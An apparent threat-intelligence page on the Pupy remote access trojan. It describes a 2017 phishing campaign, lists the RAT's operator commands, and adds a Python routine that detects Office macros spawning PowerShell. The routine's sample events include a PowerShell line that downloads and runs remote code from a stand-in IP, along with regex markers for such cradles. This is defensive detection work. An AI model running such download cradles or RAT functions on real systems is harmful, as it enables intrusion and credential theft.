Pupy

Pupy is an open-source multi-platform remote access trojan (RAT) utilized by advanced persistent threat (APT) groups. It was used in an early 2017 campaign, dubbed "Magic Hound," that targeted Saudi Arabian organizations associated with the financial, oil, and technology sectors. In this campaign, the actors used phishing emails containing attached documents embedded with malicious macros. Once enabled, these macros call Windows PowerShell to retrieve additional tools. The attachments in the phishing emails masqueraded as communications from the Saudi government as well as holiday greeting cards. Reports about the campaign indicate the attackers are likely the Iranian-government backed APT group, "Rocket Kitten." Pupy has several capabilities that can be initiated by using the following commands:

  • connect - Connect On A Client Using A Bind Payload
  • exit - Quit Pupy Shell
  • jobs - Manage Jobs
  • list_modules - List Available Modules With A Brief Description (The First Description Line)
  • python - Start The Local Python Interpreter (For Debugging Purposes)
  • read - Execute A List Of Commands From A File
  • run - Run A Module On One Or Multiple Clients
  • sessions - List/Interact With Established Sessions
  • info - Get Some Information About One Or Multiple Clients
  • ps - List Processes
  • shell - Open An Interactive Command Shell With A Nice Tty
  • getuid - Get Username
  • exec - Execute Shell Commands On A Remote System
  • migrate - Migrate Pupy Into Another Process Using Reflective Dll Injection
  • pyexec - Execute Python Code On A Remote System
  • mount - List Valid Drives In The System
  • mv - Move File Or Directory
  • mkdir - Create An Empty Directory
  • kill - Kill A Process
  • cd - Change Directory
  • getppid - List Parent Process Information
  • pwd - Print Working Directory
  • cat - Show Contents Of A File
  • exit - Exit The Client On The Other Side
  • ls - List System Files
  • rm - Remove A File Or A Directory
  • cp - Copy File Or Directory
  • creds - Database Containing All Passwords Found
  • getpid - List Process Information
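The delivery chain described above (a phishing attachment whose macro launches Windows PowerShell to fetch further tooling) leaves a characteristic trace in process-creation telemetry: an Office application spawning a script host. The following detection routine is an added example written for this page, not code from Pupy or from either vendor report; the event format, field names, the Office parent list and the download-cradle markers are assumptions, and the sample events are constructed, with a documentation-range IP, not real telemetry from the campaign.

```python
import json
import re

# Constructed sample process-creation events, shaped like a typical
# EDR / Sysmon Event ID 1 export (parent image, child image, command line).
SAMPLE_EVENTS = [
    json.dumps({"host": "ws01",
                "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "command_line": "powershell.exe -nop -w hidden -c \"IEX (New-Object "
                                "Net.WebClient).DownloadString('http://198.51.100.7/stage')\""}),
    json.dumps({"host": "ws01",
                "parent_image": r"C:\Windows\explorer.exe",
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "command_line": "powershell.exe -File C:\\scripts\\inventory.ps1"}),
    json.dumps({"host": "ws02",
                "parent_image": r"C:\Program Files\Microsoft Office\EXCEL.EXE",
                "image": r"C:\Windows\System32\cmd.exe",
                "command_line": "cmd.exe /c whoami"}),
    json.dumps({"host": "ws03",
                "parent_image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
                "image": r"C:\Windows\splwow64.exe",
                "command_line": "splwow64.exe 12288"}),
]

# Assumed lists: Office processes that should rarely spawn script hosts, and the
# script hosts a macro typically reaches for.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe",
                   "wscript.exe", "cscript.exe", "mshta.exe"}

# Substrings commonly present when PowerShell is used to fetch and run remote
# content; their presence raises the alert severity.
DOWNLOAD_MARKERS = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"start-bitstransfer|\biex\b|invoke-expression|-enc\b|-encodedcommand",
    re.IGNORECASE,
)


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return an alert dict for an Office -> script-host spawn, else None."""
    parent = basename(event.get("parent_image", ""))
    child = basename(event.get("image", ""))
    cmd = event.get("command_line", "")
    if parent not in OFFICE_PARENTS or child not in SCRIPT_CHILDREN:
        return None
    severity = "high" if DOWNLOAD_MARKERS.search(cmd) else "medium"
    return {"host": event.get("host"), "parent": parent, "child": child,
            "severity": severity, "command_line": cmd}


def scan(lines):
    """Parse JSON event lines and collect alerts; malformed lines are skipped."""
    alerts = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        alert = classify(event)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(f"[{a['severity']}] {a['host']}: {a['parent']} -> {a['child']}: {a['command_line']}")
```

Run against the constructed events, the routine raises a high-severity alert for the Word-launched PowerShell download cradle and a medium-severity one for Excel spawning cmd.exe, while ignoring the administrator's scheduled script under explorer.exe and the benign print-spooler helper Word starts. In production the parent and child lists should be tuned to the environment, since some line-of-business add-ins legitimately start script hosts from Office.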

Technical Details

  • Palo Alto Networks provides technical analysis on the Pupy RAT, available here.
  • SecureWorks provides technical analysis on the Pupy RAT, available here.